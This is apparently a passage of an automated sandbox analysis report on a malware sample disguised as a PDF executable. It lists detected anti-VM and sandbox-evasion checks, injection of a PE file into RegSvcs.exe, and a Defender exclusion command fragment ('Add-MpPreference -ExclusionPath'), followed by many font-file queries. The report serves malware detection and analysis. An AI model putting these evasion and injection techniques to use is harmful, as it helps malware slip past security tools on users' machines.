                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.2daf808.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.2db7814.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 4616, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exe TID: 4060Thread sleep time: -40740s >= -30000s
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exe TID: 5832Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2444
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7407
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeThread delayed: delay time: 40740
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017FC148 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43A000
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1152008
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: RegSvcs.exe, 00000008.00000002.556131473.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: RegSvcs.exe, 00000008.00000002.556131473.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: RegSvcs.exe, 00000008.00000002.556131473.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: RegSvcs.exe, 00000008.00000002.556131473.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Users\user\Desktop\20220114080343434.pdf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
